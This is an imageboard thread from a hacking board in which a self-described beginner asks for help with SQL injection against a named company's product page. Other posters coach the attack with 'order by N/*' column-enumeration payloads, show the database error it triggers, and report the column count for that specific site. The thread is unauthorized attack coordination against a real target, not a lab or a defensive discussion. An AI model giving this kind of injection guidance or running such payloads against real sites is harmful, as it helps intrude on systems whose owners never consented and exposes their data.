[ home / board list / faq / random / create / bans / search / manage / irc ] [ ]

/hf/ - Hack Funk

L33T's, Skids, and Leaks.

Catalog

See 8chan's new software in development (discuss) (help out)
Infinity Next Beta period has started, click here for info or go directly to beta.8ch.net
Email
Comment *
File
* = required field[▶ Show post options & limits]
Confused? See the FAQ.
Options
Password (For file and post deletion.)

Allowed file types:jpg, jpeg, gif, png, webm, mp4, pdf
Max filesize is 8 MB.
Max image dimensions are 10000 x 10000.
You may upload 3 per post.


File: 1424556946817.png (2.22 KB, 220x229, 220:229, sqlinject.png)

c53fca No.73

Hello.

I have been looking for a weak .php site and i finally found one. http://www.blacksys.co.kr/eng/product/product.php?id=8

so, first what i did was adding an ' after id=8

then i got this error: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/bsys/public_html/eng/product/product.php on line 8

And now i'm trying to see how many tables by using: order by 100/* and still getting the error. I can even add order by 1000/* and the are still showing

(yes i'm new to this and do not want to use Havij).

Any tips and tricks?

acf894 No.76

>>73


You misunderstand the order command, you must use 1 increments per function, not a 100 or a 1000

Look at this for an example:

www.halfchan.org/news.php?id=4 order by 1/* <– no error
www.halfchan.org/news.php?id=4 order by 2/* <– no error
www.halfchan.org/news.php?id=4 order by 3/* <– no error
www.halfchan.org/news.php?id=4 order by 4/* <– error (we get a relayed message along the lines of Unknown column ‘4′ in ‘order clause’)
We do not count the last table because it does not exist, so we have 3 columns.

Full guide at
>>40

I already found out the amount of columns, if you want the answer let me know.
Post last edited at

39c77c No.84

>>76
yes plz

acf894 No.85

>>84
11 columns, which would be order by 12/* = returning no error

so 11.

baf797 No.100

i got Warning: mysql_fetch_array:() supplied argument is not a valid MySQL result resource in /home/bsys/public_html/eng/product/product.php on line 11


3b858c No.101

>>100

>posting this on a board that hasn't gotten any posts for months and hasn't gotten more than 100 until now


acf894 No.102

>>101

pls stop

>>100

you forgot to order




[Return][Go to top][Catalog][Post a Reply]
Delete Post [ ]
[]
[ home / board list / faq / random / create / bans / search / manage / irc ] [ ]